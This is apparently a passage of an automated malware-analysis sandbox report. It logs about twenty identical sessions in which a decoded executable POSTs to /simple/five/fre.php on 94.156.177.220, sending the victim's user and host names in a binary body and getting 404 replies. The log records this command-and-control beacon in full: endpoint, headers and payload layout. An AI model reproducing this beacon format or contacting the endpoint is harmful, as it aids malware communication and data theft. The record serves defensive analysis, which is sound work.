78	192.168.2.4	50033	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:39.199455023 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:39.204843044 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:40.344208956 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50039	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:40.493951082 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:40.499809980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:41.490698099 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50050	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:41.648252010 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:41.653913975 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:42.628232956 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50056	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:42.769633055 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:42.775265932 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:43.771524906 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50062	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:43.932138920 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:43.937768936 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:44.921889067 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50073	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:45.071362972 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:45.077227116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:46.047409058 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50078	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:46.196688890 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:46.202322960 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:47.209161997 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50085	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:47.371918917 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:47.377458096 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:48.343065023 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50088	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:48.496957064 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:48.502507925 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:49.488792896 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50089	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:49.654278040 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:49.659828901 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:50.626844883 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50090	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:51.492516994 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:51.498323917 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:52.356110096 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50091	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:52.512600899 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:52.518212080 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:53.474535942 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50092	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:53.643651009 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:53.649173021 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:54.627542973 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50093	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:54.804053068 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:54.809439898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:55.754867077 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	50094	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:55.918642998 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:55.924734116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:56.895411015 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	50095	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:57.167407990 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:57.172837019 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:58.166055918 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	50096	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:58.333457947 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:58.339191914 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:21:59.355499983 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:21:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	50097	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:21:59.521910906 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:21:59.527534962 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:22:00.528371096 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	50098	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:22:01.011735916 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:22:01.017570972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
Oct 25, 2024 10:22:02.033549070 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 08:22:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	50099	94.156.177.220	80	7468	C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 10:22:02.178251028 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 10:22:02.183819056 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
